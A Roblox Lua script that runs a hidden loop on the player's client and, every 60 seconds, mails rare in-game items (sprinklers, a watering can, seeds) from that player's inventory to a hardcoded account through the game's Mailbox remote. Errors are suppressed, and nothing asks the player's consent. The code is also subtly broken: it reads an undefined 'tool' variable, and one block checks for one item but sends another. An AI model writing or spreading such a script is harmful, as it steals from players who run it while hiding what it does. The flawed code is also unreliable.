local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local LocalPlayer = Players.LocalPlayer
local Networking = require(ReplicatedStorage.SharedModules.Networking)

--------------------------------------------------
-- CONFIG
--------------------------------------------------

local USERNAME = "sangjukie"
local INTERVAL = 60

--------------------------------------------------
-- GET USER ID
--------------------------------------------------

local Success, UserId = pcall(function()
	return Players:GetUserIdFromNameAsync(USERNAME)
end)

if not Success then
	return
end

--------------------------------------------------
-- CHECK ITEM
--------------------------------------------------

local function HasItem(ItemName)
	local Backpack = LocalPlayer:FindFirstChild("Backpack")
	local Character = LocalPlayer.Character

	return (Backpack and Backpack:FindFirstChild(ItemName))
		or (Character and Character:FindFirstChild(ItemName))
end

--------------------------------------------------
-- LOOP GIFT
--------------------------------------------------

while task.wait(INTERVAL) do

	if HasItem("Super Sprinkler") then
		pcall(function()
			local count = tool:GetAttribute("Count") or 1

			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Sprinklers",
						ItemKey = "Super Sprinkler",
						Count = count
					}
				},
				"Super Sprinkler"
			)
		end)
	end

	if HasItem("Super Watering Can") then
		pcall(function()
			local count = tool:GetAttribute("Count") or 1

			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "WateringCans",
						ItemKey = "Super Watering Can",
						Count = count
					}
				},
				"Super Watering Can"
			)
		end)
	end

	if HasItem("Rainbow") then
		pcall(function()
			local count = tool:GetAttribute("Count") or 1

			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Rainbow",
						Count = count
					}
				},
				"Rainbow"
			)
		end)
	end

	if HasItem("Venus Fly Trap") then
		pcall(function()
			local count = tool:GetAttribute("Count") or 1

			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Venus Fly Trap",
						Count = count
					}
				},
				"Venus Fly Trap"
			)
		end)
	end

	if HasItem("Rainbow") then
		pcall(function()
			local count = tool:GetAttribute("Count") or 1

			Networking.Mailbox.SendBatch:Fire(
				UserId,
				{
					{
						Category = "Seeds",
						ItemKey = "Poison Apple",
						Count = count
					}
				},
				"Poison Apple"
			)
		end)
	end

end
